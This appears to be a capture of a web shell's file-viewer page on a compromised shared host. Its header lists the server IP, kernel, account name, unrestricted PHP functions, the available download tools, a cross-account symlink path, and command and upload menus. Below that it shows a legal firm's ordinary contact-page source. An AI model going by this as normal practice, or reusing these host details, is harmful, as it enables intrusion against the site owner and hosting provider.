Server IP : 162.214.80.37 / Your IP : 216.73.216.173 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/imyrqtmy/public_html/skyispatudyog/sym/Users/0-imyrqtmy/comlegal/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <?php include 'includes/title.php';?> </head> <body> <div class="page-wrapper"> <!-- Preloader --> <?php include 'includes/header.php';?> <!-- Start main-content --> <section class="page-title" style="background-image: url(images/background/page-title-bg.jpg);"> <div class="auto-container"> <div class="title-outer text-center"> <h1 class="title">Contact Us</h1> <ul class="page-breadcrumb"> <li><a href="index.php">Home</a></li> <li>Contact</li> </ul> </div> </div> </section> <!-- end main-content --> <!--Contact Details Start--> <section class="contact-details"> <div class="container "> <div class="row"> <div class="col-xl-7 col-lg-6"> <div class="sec-title"> <span class="sub-title">Send us email</span> <h2>Feel free to write</h2> </div> <!-- Contact Form --> <form action="mail.php" method="post"> <div class="row"> <div class="col-sm-6"> <div class="mb-3"> <input name="name" class="form-control" type="text" placeholder="Enter Name"> </div> </div> <div class="col-sm-6"> <div class="mb-3"> <input name="email" class="form-control required email" type="email" placeholder="Enter Email"> </div> </div> </div> <div class="row"> <div class="col-sm-6"> <div class="mb-3"> <input name="subject" class="form-control required" type="text" placeholder="Enter Subject"> </div> </div> <div class="col-sm-6"> <div class="mb-3"> <input name="phone" class="form-control" type="text" placeholder="Enter Phone"> </div> </div> </div> <div class="mb-3"> <textarea name="message" class="form-control required" rows="7" placeholder="Enter Message"></textarea> </div> <div class="mb-5"> <!-- <input name="form_botcheck" class="form-control" type="hidden" value="" /> --> <button type="submit" class="theme-btn btn-style-two mb-3 mb-sm-0" ><span class="btn-title">Send message</span></button> <button type="reset" class="theme-btn btn-style-two"><span class="btn-title">Reset</span></button> </div> </form> <!-- Contact Form Validation--> </div> <div class="col-xl-5 col-lg-6"> <div class="contact-details__right"> <div class="sec-title"> <span class="sub-title">Need any help?</span> <h2>Get in touch with us</h2> <div class="text">Our team ensures compliance, risk mitigation, and strategic guidance to help organizations navigate complex legal and workforce challenges.</div> </div> <ul class="list-unstyled contact-details__info"> <li class="d-block d-sm-flex align-items-sm-center "> <div class="icon"> <span class="far fa-phone-plus"></span> </div> <div class="text ml-xs--0 mt-xs-10"> <h6>Have any question?</h6> <a href="tel:+91 98106 97834"><span>Free</span> +91 98106 97834</a> </div> </li> <li class="d-block d-sm-flex align-items-sm-center "> <div class="icon"> <span class="far fa-envelope fa-fw"></span> </div> <div class="text ml-xs--0 mt-xs-10"> <h6>Write email</h6> <a href="mailto: comlegalassociates@gmail.com "><span class="__cf_email__" data-cfemail="8fe1eaeaebe7eae3ffcfece0e2ffeee1f6a1ece0e2">comlegalassociates@gmail.com </span></a> </div> </li> <li class="d-block d-sm-flex align-items-sm-center "> <div class="icon"> <span class="far fa-location-dot fa-fw"></span> </div> <div class="text ml-xs--0 mt-xs-10"> <h6>Registered Office:</h6> <span> 306, New Delhi Apartments, Vasundhara Enclave, Delhi 110096</span> <h6>Office: </h6> <span>1st Floor, Plot No. 15, Service Centre, Vasundhara Enclave, Delhi 110096</span> </div> </li> </ul> </div> </div> </div> </div> </section> <!--Contact Details End--> <!-- Map Section--> <section class="map-section"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3503.2740639624803!2d77.309178!3d28.591553899999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x390ce5004ce570c9%3A0xb78c1e415665acfb!2sCom%20Legal%20Associates%20LLP!5e0!3m2!1sen!2sin!4v1739395466367!5m2!1sen!2sin" width="100%" height="450" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </section> <!--End Map Section--> <?php include 'includes/footer.php';?> <!--End Main Footer --> </div><!-- End Page Wrapper --> <!-- Scroll To Top --> <div class="scroll-to-top scroll-to-target" data-target="html"><span class="fa fa-angle-up"></span></div> <script data-cfasync="false" src="../../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="js/jquery.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/jquery.fancybox.js"></script> <script src="js/jquery-ui.js"></script> <script src="js/gsap.min.js"></script> <script src="js/ScrollTrigger.min.js"></script> <script src="js/splitType.js"></script> <script src="js/wow.js"></script> <script src="js/appear.js"></script> <script src="js/script.js"></script> <!-- form submit --> <script src="js/jquery.validate.min.js"></script> <script src="js/jquery.form.min.js"></script> <script> (function($) { $("#contact_form").validate({ submitHandler: function(form) { var form_btn = $(form).find('button[type="submit"]'); var form_result_div = '#form-result'; $(form_result_div).remove(); form_btn.before('<div id="form-result" class="alert alert-success" role="alert" style="display: none;"></div>'); var form_btn_old_msg = form_btn.html(); form_btn.html(form_btn.prop('disabled', true).data("loading-text")); $(form).ajaxSubmit({ dataType: 'json', success: function(data) { if( data.status == 'true' ) { $(form).find('.form-control').val(''); } form_btn.prop('disabled', false).html(form_btn_old_msg); $(form_result_div).html(data.message).fadeIn('slow'); setTimeout(function(){ $(form_result_div).fadeOut('slow') }, 6000); } }); } }); })(jQuery); </script> </body> </html>